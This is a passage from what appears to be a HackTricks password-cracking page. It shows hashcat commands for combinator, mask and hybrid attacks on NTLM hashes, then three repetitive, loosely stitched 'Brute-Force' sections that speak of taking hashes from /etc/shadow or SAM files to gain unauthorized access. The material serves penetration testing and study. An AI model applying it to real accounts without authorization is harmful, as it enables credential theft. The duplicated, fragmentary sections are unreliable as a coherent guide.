# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
  • Attaque par masque (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.

# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
  • Attaque Wordlist + Masque (-a 6) / Masque + Wordlist (-a 7)
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Modes Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Brute Forcing

Introduction

Brute forcing is a common technique used to crack passwords by systematically attempting all possible combinations of characters until the correct one is found. This method is often used to crack hashed passwords obtained from the /etc/shadow file on Linux systems.

Tools

There are various tools available for brute forcing passwords, such as John the Ripper, Hashcat, and Hydra. These tools can be used to automate the process of trying different password combinations quickly and efficiently.

Methodology

  1. Obtain Hashed Passwords: The first step is to obtain the hashed passwords from the /etc/shadow file on a Linux system. This file stores the hashed passwords of users on the system.

  2. Select a Tool: Choose a suitable tool for brute forcing passwords. Tools like John the Ripper are popular for this purpose due to their effectiveness and speed.

  3. Configure the Tool: Set up the chosen tool with the necessary parameters, such as the hash type and any specific rules for password generation.

  4. Start Brute Forcing: Initiate the brute forcing process using the selected tool. The tool will systematically try different password combinations until the correct one is found.

  5. Crack the Password: Once the tool successfully cracks the password, the plaintext password will be revealed. This password can then be used to gain unauthorized access to the system.

Conclusion

Brute forcing is a powerful technique for cracking passwords, especially when dealing with hashed passwords stored in the /etc/shadow file on Linux systems. By using specialized tools and following a systematic approach, hackers can potentially uncover weak passwords and gain unauthorized access to systems.

500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Brute-Force

Introduction

Brute-force attacks are a common method used to crack passwords by systematically trying all possible combinations until the correct one is found. This technique can be used to crack Windows hashes obtained from the SAM file or through other means.

Tools

There are various tools available for performing brute-force attacks on Windows hashes, such as John the Ripper and Hashcat. These tools support different algorithms and can be highly effective in cracking passwords.

Methodology

  1. Obtain the Windows hash that you want to crack.
  2. Use a tool like John the Ripper or Hashcat to perform a brute-force attack.
  3. Configure the tool with the appropriate settings, such as the hash type and character set.
  4. Start the brute-force attack and wait for the tool to find the correct password.
  5. Once the password is found, you can use it to gain unauthorized access to the Windows system.

By following this methodology, you can effectively crack Windows hashes using brute-force techniques.

3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Brute-Force

Introduction

Brute-force attacks are a common method used to crack hashes. This technique involves trying all possible combinations of characters until the correct one is found. Brute-force attacks can be time-consuming but are effective against weak passwords.

Tools

There are various tools available for conducting brute-force attacks, such as John the Ripper, Hashcat, and Hydra. These tools can be customized to target specific hash algorithms and character sets, increasing the efficiency of the attack.

Methodology

  1. Select Target Hash: Obtain the hash of the target application or system that you want to crack.

  2. Choose Brute-Force Tool: Select a suitable brute-force tool based on the hash algorithm and character set used.

  3. Configure Tool: Customize the tool settings to match the target hash algorithm and define the character set to be used in the attack.

  4. Initiate Attack: Start the brute-force attack and let the tool try all possible combinations until the correct password is found.

  5. Optimize: Adjust the attack parameters based on the progress and feedback from the tool to optimize the attack speed and efficiency.

Resources

By following a systematic approach and using the right tools, brute-force attacks can be a powerful method for cracking common application hashes.

900 | MD4                                              | Raw Hash
0 | MD5                                              | Raw Hash
5100 | Half MD5                                         | Raw Hash
100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
1400 | SHA-256                                          | Raw Hash
1700 | SHA-512                                          | Raw Hash
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

D'autres façons de soutenir HackTricks :


Utilisez Trickest pour construire et automatiser facilement des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}